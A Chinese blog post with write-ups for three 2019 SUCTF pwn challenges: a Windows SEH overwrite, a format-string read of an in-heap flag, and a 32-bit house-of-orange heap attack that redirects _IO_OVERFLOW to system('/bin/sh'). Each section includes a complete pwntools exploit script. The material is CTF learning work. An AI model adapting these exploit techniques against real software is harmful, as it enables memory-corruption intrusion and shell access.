<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>2019 SUCTF PWN WP - Mask&#39;s blogs</title>


    <meta name="description" content="这次和其他一些想进SU的师傅一起打的，感觉到其他师傅很厉害，我也就输出了两道PWN，太菜了">
<meta property="og:type" content="article">
<meta property="og:title" content="2019 SUCTF PWN WP">
<meta property="og:url" content="http://mask6asok.top/2019/12/15/2019SUCTF.html">
<meta property="og:site_name" content="Mask&#39;s blogs">
<meta property="og:description" content="这次和其他一些想进SU的师傅一起打的，感觉到其他师傅很厉害，我也就输出了两道PWN，太菜了">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://mask6asok.top/images/og_image.png">
<meta property="og:updated_time" content="2020-01-20T06:46:33.954Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019 SUCTF PWN WP">
<meta name="twitter:description" content="这次和其他一些想进SU的师傅一起打的，感觉到其他师傅很厉害，我也就输出了两道PWN，太菜了">
<meta name="twitter:image" content="http://mask6asok.top/images/og_image.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    
    


<link rel="stylesheet" href="/css/style.css">
</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.ico" alt="2019 SUCTF PWN WP" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">Home</a>
                
                <a class="navbar-item"
                href="/archives">Archives</a>
                
                <a class="navbar-item"
                href="/categories">Categories</a>
                
                <a class="navbar-item"
                href="/tags">Tags</a>
                
                <a class="navbar-item"
                href="/about">About</a>
                
            </div>
            
            <div class="navbar-end">
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main">  

<div class="card">
    
    <div class="card-content article ">
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                <i class="fas fa-angle-double-right"></i>2019 SUCTF PWN WP
            
        </h1>
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2019-12-15T13:55:22.204Z"><i class="far fa-calendar-alt">&nbsp;</i>2019-12-15</time>
                
                <time class="level-item has-text-grey is-hidden-mobile" datetime="2020-01-20T06:46:33.954Z"><i class="far fa-calendar-check">&nbsp;</i>2020-01-20</time>
                
                
                <div class="level-item">
                <i class="far fa-folder-open has-text-grey"></i>&nbsp;
                <a class="has-link-grey -link" href="/categories/Pwn/">Pwn</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    <i class="far fa-clock"></i>&nbsp;
                    
                    
                    10 分钟 读完 (大约 1568 个字)
                </span>
                
                
            </div>
        </div>
        
        <div class="content">
            <p>这次和其他一些想进SU的师傅一起打的，感觉到其他师傅很厉害，我也就输出了两道PWN，太菜了</p>
<a id="more"></a>
<h1 id="babystack"><a href="#babystack" class="headerlink" title="babystack"></a>babystack</h1><p>这道win pwn不是我做的，是le3d1ng师傅做的，但是我觉得很有意义，先记录一下</p>
<hr>
<p>非常类似的一个原题 ： <a href="https://bbs.pediy.com/thread-221016.htm">https://bbs.pediy.com/thread-221016.htm</a><br>看到入口函数的handler func为目标函数。<br>第一步使用div触发一个异常进入目标函数。这里可以控制esi。<br><img src="https://hackmd.summershrimp.com/uploads/upload_6f9be14e79bd6a6c05b1033a1d0af69a.png" alt=""><br>接着按照例子的分析构造payload即可。与例子不同的是，此题的fake scope table貌似必须构造在SEH结构后面，构造在前面的话会被破坏？从而导致不会正常执行。<br>EXP：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding=utf8 -*-</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string"># Author: le3d1ng</span></span><br><span class="line"><span class="string"># Created Time : 2019年08月17日 星期六 18时17分57秒</span></span><br><span class="line"><span class="string"># File Name: exp.py</span></span><br><span class="line"><span class="string"># Description:</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">'121.40.159.66'</span>,<span class="number">6666</span>)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">"stack address = "</span>)</span><br><span class="line">stackaddr = int(io.recv(<span class="number">8</span>),<span class="number">16</span>) <span class="number">-0xc8</span><span class="number">-4</span></span><br><span class="line">success(<span class="string">'stackaddr:'</span>+str(stackaddr+<span class="number">0x9c</span><span class="number">-12</span>))</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">"what did you know?\r\n"</span>,<span class="string">'0X212121'</span>)</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">" know more?\r\n"</span>,<span class="string">'yes'</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"want to know?\r\n"</span>,<span class="string">'2342916'</span>)</span><br><span class="line">io.recvuntil(<span class="string">"s 0x23C004 value is "</span>)</span><br><span class="line">cookie = int(io.recv(<span class="number">10</span>),<span class="number">16</span>)</span><br><span class="line">success(<span class="string">'cookie:'</span>+hex(cookie))</span><br><span class="line"><span class="comment">#io.interactive()</span></span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">" know more?\r\n"</span>,<span class="string">'yes'</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"want to know?\r\n"</span>,str(stackaddr+<span class="number">0x9c</span><span class="number">-12</span>))</span><br><span class="line">io.recvuntil(<span class="string">"value is "</span>)</span><br><span class="line">gs = int(io.recv(<span class="number">10</span>),<span class="number">16</span>)</span><br><span class="line">success(<span class="string">'gs:'</span>+hex(gs))</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">" know more?\r\n"</span>,<span class="string">'yes'</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"want to know?\r\n"</span>,str(stackaddr+<span class="number">0x9c</span><span class="number">-8</span>))</span><br><span class="line">io.recvuntil(<span class="string">"value is "</span>)</span><br><span class="line">data1 = int(io.recvuntil(<span class="string">'\r\n'</span>),<span class="number">16</span>)</span><br><span class="line">success(<span class="string">'data1:'</span>+hex(data1))</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">" know more?\r\n"</span>,<span class="string">'yes'</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"want to know?\r\n"</span>,str(stackaddr+<span class="number">0x9c</span><span class="number">-4</span>))</span><br><span class="line">io.recvuntil(<span class="string">"value is "</span>)</span><br><span class="line">data2 = int(io.recvuntil(<span class="string">'\r\n'</span>),<span class="number">16</span>)</span><br><span class="line">success(<span class="string">'data2:'</span>+hex(data2))</span><br><span class="line"></span><br><span class="line">filterfunc = <span class="number">0x1c8224</span></span><br><span class="line">success(<span class="string">'filter:'</span>+hex(filterfunc))</span><br><span class="line"><span class="comment">#exit()#0x1C8224</span></span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">" know more?\r\n"</span>,<span class="string">'yes'</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"want to know?\r\n"</span>,str(stackaddr+<span class="number">0x9c</span>))</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">"value is "</span>)</span><br><span class="line">sehnext = int(io.recv(<span class="number">8</span>),<span class="number">16</span>)</span><br><span class="line">success(<span class="string">'sehnext:'</span>+hex(sehnext))</span><br><span class="line"></span><br><span class="line">sehhandler = <span class="number">0x1c9a30</span></span><br><span class="line">func = <span class="number">0x1c8266</span><span class="comment">#0x1c822a</span></span><br><span class="line">scope = cookie ^ (stackaddr+<span class="number">4</span>)</span><br><span class="line">success(<span class="string">'new scope:'</span>+str(stackaddr+<span class="number">4</span>))</span><br><span class="line"><span class="comment">#testscope = cookie ^ 2337984</span></span><br><span class="line"><span class="comment">#testscope2 = cookie ^ 2338016</span></span><br><span class="line"><span class="comment">#success()</span></span><br><span class="line"><span class="comment">#pay = "aaaa"+p32(0xffffffe4)+p32(0)+p32(0xFFFFFF0c)+p32(0)+p32(0xfffffffe) +p32(filterfunc)+ p32(func)+'\x00'*4+'a'*108+p32(gs)+p32(data1)+p32(data2)+p32(sehnext)+ p32(sehhandler) + p32(scope)</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">scope2 = cookie ^ (stackaddr+<span class="number">0x9c</span>+<span class="number">16</span>)</span><br><span class="line">pay2=<span class="string">"a"</span>*<span class="number">144</span>+p32(gs)+p32(data1)+p32(data2)+p32(sehnext)+ p32(sehhandler) + p32(scope2) + <span class="string">"\00"</span>*<span class="number">4</span>+p32(<span class="number">0xffffffe4</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0xFFFFFF0c</span>)+p32(<span class="number">0</span>)+p32(<span class="number">0xfffffffe</span>) +p32(filterfunc)+ p32(func)+<span class="string">'\x00'</span>*<span class="number">4</span></span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">" know more?\r\n"</span>,<span class="string">'noo'</span>)</span><br><span class="line"></span><br><span class="line">io.sendline(pay2)</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">" know more?\r\n"</span>,<span class="string">'yes'</span>)</span><br><span class="line">io.sendlineafter(<span class="string">"want to know?\r\n"</span>,<span class="string">'le3d1ng'</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="playfmt"><a href="#playfmt" class="headerlink" title="playfmt"></a>playfmt</h1><p>无限格式化字符串利用，但是buf不在栈上，无法直接进行任意地址读写</p>
<p><img src="https://i.loli.net/2019/08/19/CmezNbBvgcT935K.png" alt="p0.png"></p>
<p>通过IDA分析我们知道，flag内容是读到堆里，而且栈上遗留有部分指向堆的指针，但并不指向flag</p>
<p><img src="https://i.loli.net/2019/08/19/Pv8zkcBqIQ5NLhb.png" alt="p1.png"></p>
<p>同时栈上也有指向栈的指针，也有指向 指向栈的指针 的指针</p>
<p><img src="https://i.loli.net/2019/08/19/UHQqOLPp1fhXBgs.png" alt="p2.png"></p>
<p>我们可以先利用指向 指向栈的指针 的指针，来修改栈上指向栈的指针，使其指向存放堆指针的地址，然后再通过这个指针，修改堆指针的低位指向flag</p>
<p><img src="https://i.loli.net/2019/08/19/T7SdXRyZI8ijAuF.png" alt="p3.png"></p>
<p>最后利用 %n$s 读取出来</p>
<p>EXP：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">"./playfmt"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"=\n"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"r\n"</span>)</span><br><span class="line">p.recvuntil(<span class="string">"=\n"</span>)</span><br><span class="line">pause(<span class="number">2</span>)</span><br><span class="line">payload = <span class="string">"%6$p"</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">stack1 = int(p.recvuntil(<span class="string">'\n'</span>, drop=<span class="literal">True</span>), <span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> hex(stack1)</span><br><span class="line">num = (stack1 &amp; <span class="number">0xff</span>)+<span class="number">0x10</span></span><br><span class="line"><span class="keyword">print</span> hex(num)</span><br><span class="line">payload = <span class="string">'%&#123;&#125;c%6$hhn'</span>.format(num)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line">payload = <span class="string">'%16c%14$hhn'</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line">payload = <span class="string">"%18$s"</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br></pre></td></tr></table></figure>
<h1 id="二手旧电脑"><a href="#二手旧电脑" class="headerlink" title="二手旧电脑"></a>二手旧电脑</h1><p>old pc,old method.</p>
<p>去年的2018 SUCTF也有一道类似的题目，也是利用了house of orange来攻击</p>
<p>不过这里是32位，所以fake _IO_FILE的结构还是需要自己伪造一遍</p>
<p>问了一下出题人，rename里的函数是可以实现house of spirit，有空试一下</p>
<p>这道题libc巨坑，服务器的libc和16.04的libc的main_arena偏移低三位是一样的</p>
<p>不过公告给出了libc的版本，我却没去留意。。。</p>
<p>这里给的还是16.04的libc的exp</p>
<hr>
<p>在申请chunk的时候，input name时调用scanf %s存在null byte overflow</p>
<p>利用这个null byte可以修改nextchunk的prev_inuse为false</p>
<p>从而实现chunk overlapping ，并获取一个unsortedbin chunk</p>
<p>将此unsortbin chunk的头部控制在一个fastbin chunk的user data区域内</p>
<p>修改bk为_IO_list_all-0x8的值，通过unsortedbin attack修改 _IO_list_all指向main_arena+48</p>
<p>此时对应的IOFILE结构体是不正确的，在调用到相关IO函数时，会进_chain对应的结构题</p>
<p>此时_chain成员所在位置为main_arena+88</p>
<p>这是一个0x30的chunk所在地，事前通过修改unsortedbin chunk的size为0x30即可成功链入</p>
<p>接着就伪造IOFILE与vtable，触发unsortedbin attack时是malloc一个chunk，此时由于arena结构与unsortdbin结构被破坏了，会触发错误，调用malloc_printerr，一系列操作进入 _IO_flush_all_lockp，在其中控制其进入 _IO_OVERFLOW，最终拿shell</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">   <span class="keyword">if</span> (((fp-&gt;_mode &lt;= <span class="number">0</span> &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base)</span><br><span class="line"> || (_IO_vtable_offset (fp) == <span class="number">0</span></span><br><span class="line">     &amp;&amp; fp-&gt;_mode &gt; <span class="number">0</span> &amp;&amp; (fp-&gt;_wide_data-&gt;_IO_write_ptr</span><br><span class="line">	    &gt; fp-&gt;_wide_data-&gt;_IO_write_base))</span><br><span class="line"> )</span><br><span class="line">&amp;&amp; _IO_OVERFLOW (fp, EOF) == EOF)  <span class="comment">// 修改_IO_OVERFLOW 为 system </span></span><br><span class="line">                                    	 <span class="comment">// fp改为/bin/sh</span></span><br><span class="line">       								 <span class="comment">// system("/bin/sh")</span></span><br></pre></td></tr></table></figure>
<p>EXP：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./comp"</span>)</span><br><span class="line">libc = ELF(<span class="string">"/lib/i386-linux-gnu/libc-2.23.so"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dbg</span><span class="params">(s)</span>:</span></span><br><span class="line">    gdb.attach(p, s)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pur</span><span class="params">(a, b, c)</span>:</span></span><br><span class="line">    <span class="string">'''</span></span><br><span class="line"><span class="string">    len name price</span></span><br><span class="line"><span class="string">    '''</span></span><br><span class="line">    p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">":"</span>, str(a))</span><br><span class="line">    p.sendafter(<span class="string">":"</span>, str(b))</span><br><span class="line">    p.sendlineafter(<span class="string">":"</span>, str(c))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">com</span><span class="params">(a, b, c)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'2'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">":"</span>, str(a))</span><br><span class="line">    p.sendafter(<span class="string">":"</span>, str(b))</span><br><span class="line">    p.sendlineafter(<span class="string">":"</span>, str(c))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">thr</span><span class="params">(a)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">":"</span>, str(a))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ren</span><span class="params">(a, b)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'4'</span>)</span><br><span class="line">    p.sendline(str(a))</span><br><span class="line">    p.sendline(str(b))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exp</span><span class="params">()</span>:</span></span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    com(<span class="number">0</span>, <span class="string">'asdf'</span>, <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    thr(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    pur(<span class="number">1</span>, <span class="string">'a'</span>, <span class="number">1</span>)</span><br><span class="line">    com(<span class="number">0</span>, <span class="string">'bbb\n'</span>, <span class="number">1</span>)</span><br><span class="line">    <span class="comment"># context.log_level = 'debug'</span></span><br><span class="line">    thr(<span class="number">0</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">    libc_base = u32(p.recv(<span class="number">4</span>))<span class="number">-0x1b27b0</span></span><br><span class="line">    info(<span class="string">"libc:"</span>+hex(libc_base))</span><br><span class="line"></span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    com(<span class="number">0</span>, <span class="string">'ccc\n'</span>, <span class="number">1</span>)</span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    com(<span class="number">2</span>, <span class="string">'ddd\n'</span>, <span class="number">1</span>)</span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    thr(<span class="number">0</span>)</span><br><span class="line">    thr(<span class="number">2</span>)</span><br><span class="line">    com(<span class="number">1</span>, <span class="string">'eee\n'</span>, <span class="number">1</span>)</span><br><span class="line">    thr(<span class="number">1</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">    heap_base = u32(p.recv(<span class="number">4</span>))<span class="number">-0x138</span></span><br><span class="line">    info(<span class="string">"heap:"</span>+hex(heap_base))</span><br><span class="line"></span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    pur(<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>)</span><br><span class="line">    com(<span class="number">2</span>, <span class="number">1</span>, <span class="number">1</span>)  <span class="comment"># here</span></span><br><span class="line">    com(<span class="number">3</span>, <span class="number">1</span>, <span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    fakechunk = p32(<span class="number">0</span>)*<span class="number">3</span>+p32(<span class="number">0x49</span>)+p32(heap_base+<span class="number">0x218</span>)*<span class="number">2</span></span><br><span class="line">    pur(<span class="number">0x3c</span>, fakechunk+<span class="string">'\n'</span>, <span class="number">1</span>)  <span class="comment"># 4</span></span><br><span class="line">    pur(<span class="number">0xfc</span>, <span class="string">'asd2\n'</span>, <span class="number">1</span>)  <span class="comment"># 5</span></span><br><span class="line">    pur(<span class="number">0x2c</span>, <span class="string">'asd3\n'</span>, <span class="number">1</span>)  <span class="comment"># 6</span></span><br><span class="line">    thr(<span class="number">5</span>)</span><br><span class="line">    thr(<span class="number">4</span>)</span><br><span class="line">    thr(<span class="number">6</span>)</span><br><span class="line">    system = libc_base+libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">    fake_file = p32(<span class="number">0</span>) + p32(<span class="number">1</span>)</span><br><span class="line">    fake_file += p32(system)*<span class="number">27</span>+<span class="string">'\x00'</span></span><br><span class="line">    fake_file += p32(heap_base+<span class="number">0x2a8</span>+<span class="number">8</span>)</span><br><span class="line">    fake_file += p32(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">    fake_file += p32(libc_base+libc.symbols[<span class="string">'system'</span>])*<span class="number">20</span></span><br><span class="line"></span><br><span class="line">    pur(<span class="number">0xfc</span>, fake_file+<span class="string">'\n'</span>, <span class="number">1</span>)</span><br><span class="line">    pur(<span class="number">0x14</span>, <span class="string">'1'</span>*<span class="number">0x10</span>+p32(<span class="number">0x48</span>), <span class="number">1</span>)</span><br><span class="line">    thr(<span class="number">4</span>)</span><br><span class="line">    list_all = libc_base+libc.symbols[<span class="string">'_IO_list_all'</span>]</span><br><span class="line">    fakechunk = p64(<span class="number">0</span>)+<span class="string">'sh\x00\x00'</span> + p32(<span class="number">0x30</span>)</span><br><span class="line">    fakechunk += p32(<span class="number">0xddaa</span>) + p32(list_all<span class="number">-0x8</span>)</span><br><span class="line">    fakechunk += p32(<span class="number">0</span>) + p32(<span class="number">1</span>)</span><br><span class="line">    context.log_level = <span class="string">'debug'</span></span><br><span class="line">    pur(<span class="number">0x3c</span>, fakechunk+<span class="string">'\n'</span>, <span class="number">1</span>)</span><br><span class="line">    <span class="comment">#pur(0x400, 1, 1)</span></span><br><span class="line">    p.recv()</span><br><span class="line">    p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.recv()</span><br><span class="line">    <span class="comment"># p.sendlineafter(":", str(400))</span></span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">exp()</span><br></pre></td></tr></table></figure>
<h1 id="sudrv"><a href="#sudrv" class="headerlink" title="sudrv"></a>sudrv</h1><p>TO-DO</p>
<p>不会啊，有空学学内核PWN</p>

        </div>
        
            <ul class="post-copyright">
            <li><strong>本文标题：</strong><a href="http://mask6asok.top/2019/12/15/2019SUCTF.html">2019 SUCTF PWN WP</a></li>
            <li><strong>本文作者：</strong><a href="http://mask6asok.top">Mask</a></li>
            <li><strong>本文链接：</strong><a href="http://mask6asok.top/2019/12/15/2019SUCTF.html">http://mask6asok.top/2019/12/15/2019SUCTF.html</a></li>
            <li><strong>发布时间：</strong>2019-12-15</li>
            <li><strong>版权声明：</strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
            </li>
            </ul>
        
        
        
        
    </div>
</div>





<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2019/12/15/2019HuWangCup-mergeheap.html">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">2019 护网杯 mergeheap</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2019/12/15/2019ByteCTF-mulnote.html">
                <span class="level-item">2019 ByteCTF Pwn</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>


</div>
                




<div class="column is-4-tablet is-4-desktop is-3-widescreen  has-order-1 column-left is-sticky">
    
        


    <div class="card widget" id="toc">
        <div class="card-content">
            <div class="menu">
                <h3 class="menu-label">
                    目录
                </h3>
                <ul class="menu-list"><li>
        <a class="is-flex" href="#babystack">
        <span class="has-mr-6">1</span>
        <span>babystack</span>
        </a></li><li>
        <a class="is-flex" href="#playfmt">
        <span class="has-mr-6">2</span>
        <span>playfmt</span>
        </a></li><li>
